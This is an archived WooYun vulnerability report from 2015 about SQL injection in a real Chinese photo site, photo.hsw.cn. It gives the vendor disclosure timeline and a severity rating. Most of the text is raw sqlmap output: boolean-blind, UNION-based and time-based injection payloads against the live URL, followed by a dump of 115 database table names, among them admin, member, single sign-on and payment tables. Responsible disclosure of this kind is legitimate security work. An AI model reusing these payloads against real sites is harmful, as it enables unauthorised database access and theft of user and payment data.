乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-01: 细节已通知厂商并且等待厂商处理中 2015-06-02: 厂商已经确认,细节仅向厂商公开 2015-06-12: 细节向核心白帽子及相关领域专家公开 2015-06-22: 细节向普通白帽子公开 2015-07-02: 细节向实习白帽子公开 2015-07-17: 细节向公众公开
http://photo.hsw.cn:80/Activity/index/catid/24
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: URIParameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://photo.hsw.cn:80/Activity/index/catid/24) AND 2978=2978 AND (5251=5251 Type: UNION query Title: MySQL UNION query (NULL) - 22 columns Payload: http://photo.hsw.cn:80/Activity/index/catid/24) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7173677071,0x54576a744b4d4d75536c,0x7177756271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://photo.hsw.cn:80/Activity/index/catid/24) AND SLEEP(5) AND (4494=4494---back-end DBMS: MySQL 5.0.11Database: hsfoto[115 tables]+-----------------------+| hs_admin || hs_admin_panel || hs_admin_role || hs_admin_role_priv || hs_announce || hs_attachment || hs_attachment_index || hs_badword || hs_block || hs_block_history || hs_block_priv || hs_cache || hs_category || hs_category_priv || hs_collection_content || hs_collection_history || hs_collection_node || hs_collection_program || hs_comment || hs_comment_check || hs_comment_data_1 || hs_comment_setting || hs_comment_table || hs_content_check || hs_copyfrom || hs_datacall || hs_dbsource || hs_download || hs_download_data || hs_downservers || hs_extend_setting || hs_favorite || hs_foto_article || hs_foto_article_data || hs_foto_city || hs_foto_city_data || hs_foto_follow || hs_foto_images || hs_foto_tag || hs_foto_works || hs_foto_works_data || hs_hits || hs_ipbanned || hs_keylink || hs_keyword || hs_keyword_data || hs_like || hs_link || hs_linkage || hs_log || hs_loginkey || hs_member || hs_member_detail || hs_member_group || hs_member_menu || hs_member_verify || hs_member_vip || hs_menu || hs_model || hs_model_field || hs_module || hs_mood || hs_news || hs_news_data || hs_notice || hs_openlogin || hs_page || hs_pay_account || hs_pay_payment || hs_pay_spend || hs_picture || hs_picture_data || hs_position || hs_position_data || hs_poster || hs_poster_201408 || hs_poster_201409 || hs_poster_201410 || hs_poster_201411 || hs_poster_201412 || hs_poster_201501 || hs_poster_201502 || hs_poster_201503 || hs_poster_201504 || hs_poster_201505 || hs_poster_space || hs_queue || hs_release_point || hs_search || hs_search_keyword || hs_session || hs_site || hs_special || hs_special_c_data || hs_special_content || hs_sphinx_counter || hs_sso_admin || hs_sso_applications || hs_sso_members || hs_sso_messagequeue || hs_sso_session || hs_sso_settings || hs_tag || hs_template_bak || hs_times || hs_type || hs_urlrule || hs_video || hs_video_content || hs_video_data || hs_video_store || hs_workflow || hs_zt_dream || hs_zt_dream_ip || hs_zt_dream_token |+-----------------------+
hscenter库:
这个得多给点分吧~
危害等级:中
漏洞Rank:6
确认时间:2015-06-02 16:23
啊
暂无